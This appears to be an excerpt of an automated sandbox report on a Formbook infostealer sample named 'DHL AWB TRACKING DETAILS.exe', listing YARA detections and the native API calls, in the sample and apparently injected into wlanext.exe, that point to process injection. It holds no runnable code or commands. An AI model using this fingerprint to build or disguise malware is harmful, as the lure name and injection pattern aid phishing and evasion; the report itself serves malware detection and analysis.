          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL AWB TRACKING DETAILS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DHL AWB TRACKING DETAILS.exe.2f10000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.DHL AWB TRACKING DETAILS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.DHL AWB TRACKING DETAILS.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.636107094.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.359424691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.635990166.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.360270037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.409581872.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.362630153.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.436793150.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.394582472.000000000F123000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.436005605.00000000009A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0332B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: String function: 00A0B150 appears 35 times
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A360 NtCreateFile,1_2_0041A360
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A410 NtReadFile,1_2_0041A410
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A490 NtClose,1_2_0041A490
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A540 NtAllocateVirtualMemory,1_2_0041A540
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A35B NtCreateFile,1_2_0041A35B
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A40A NtReadFile,1_2_0041A40A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041A53A NtAllocateVirtualMemory,1_2_0041A53A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A498F0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A49860
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,1_2_00A49840
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,1_2_00A499A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A49910
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,1_2_00A49A20
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A49A00
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,1_2_00A49A50
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A495D0 NtClose,LdrInitializeThunk,1_2_00A495D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,1_2_00A49540
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A496E0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A49660
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A497A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A49780
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A49710
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A498A0 NtWriteVirtualMemory,1_2_00A498A0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49820 NtEnumerateKey,1_2_00A49820
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4B040 NtSuspendThread,1_2_00A4B040
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A499D0 NtCreateProcessEx,1_2_00A499D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49950 NtQueueApcThread,1_2_00A49950
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A80 NtOpenDirectoryObject,1_2_00A49A80
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A10 NtQuerySection,1_2_00A49A10
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4A3B0 NtGetContextThread,1_2_00A4A3B0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49B00 NtSetValueKey,1_2_00A49B00
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A495F0 NtQueryInformationFile,1_2_00A495F0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49520 NtWaitForSingleObject,1_2_00A49520
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4AD30 NtSetContextThread,1_2_00A4AD30
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49560 NtWriteFile,1_2_00A49560
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A496D0 NtCreateKey,1_2_00A496D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49610 NtEnumerateValueKey,1_2_00A49610
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49670 NtQueryInformationProcess,1_2_00A49670
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49650 NtQueryValueKey,1_2_00A49650
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49FE0 NtCreateMutant,1_2_00A49FE0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49730 NtQueryVirtualMemory,1_2_00A49730
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4A710 NtOpenProcessToken,1_2_00A4A710
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49760 NtOpenProcess,1_2_00A49760
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49770 NtSetInformationFile,1_2_00A49770
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4A770 NtOpenThread,1_2_00A4A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369710 NtQueryInformationToken,LdrInitializeThunk,11_2_03369710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369780 NtMapViewOfSection,LdrInitializeThunk,11_2_03369780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369FE0 NtCreateMutant,LdrInitializeThunk,11_2_03369FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03369660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369650 NtQueryValueKey,LdrInitializeThunk,11_2_03369650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A50 NtCreateFile,LdrInitializeThunk,11_2_03369A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033696E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_033696E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033696D0 NtCreateKey,LdrInitializeThunk,11_2_033696D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_03369910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369540 NtReadFile,LdrInitializeThunk,11_2_03369540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033699A0 NtCreateSection,LdrInitializeThunk,11_2_033699A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033695D0 NtClose,LdrInitializeThunk,11_2_033695D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369860 NtQuerySystemInformation,LdrInitializeThunk,11_2_03369860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369840 NtDelayExecution,LdrInitializeThunk,11_2_03369840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369730 NtQueryVirtualMemory,11_2_03369730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336A710 NtOpenProcessToken,11_2_0336A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369B00 NtSetValueKey,11_2_03369B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369770 NtSetInformationFile,11_2_03369770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336A770 NtOpenThread,11_2_0336A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369760 NtOpenProcess,11_2_03369760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336A3B0 NtGetContextThread,11_2_0336A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033697A0 NtUnmapViewOfSection,11_2_033697A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A20 NtResumeThread,11_2_03369A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369610 NtEnumerateValueKey,11_2_03369610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A10 NtQuerySection,11_2_03369A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A00 NtProtectVirtualMemory,11_2_03369A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369670 NtQueryInformationProcess,11_2_03369670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A80 NtOpenDirectoryObject,11_2_03369A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336AD30 NtSetContextThread,11_2_0336AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369520 NtWaitForSingleObject,11_2_03369520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369560 NtWriteFile,11_2_03369560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369950 NtQueueApcThread,11_2_03369950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033695F0 NtQueryInformationFile,11_2_033695F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033699D0 NtCreateProcessEx,11_2_033699D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369820 NtEnumerateKey,11_2_03369820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336B040 NtSuspendThread,11_2_0336B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033698A0 NtWriteVirtualMemory,11_2_033698A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033698F0 NtReadVirtualMemory,11_2_033698F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A360 NtCreateFile,11_2_00A1A360
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A490 NtClose,11_2_00A1A490
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A410 NtReadFile,11_2_00A1A410
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A540 NtAllocateVirtualMemory,11_2_00A1A540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A35B NtCreateFile,11_2_00A1A35B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A40A NtReadFile,11_2_00A1A40A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A53A NtAllocateVirtualMemory,11_2_00A1A53A
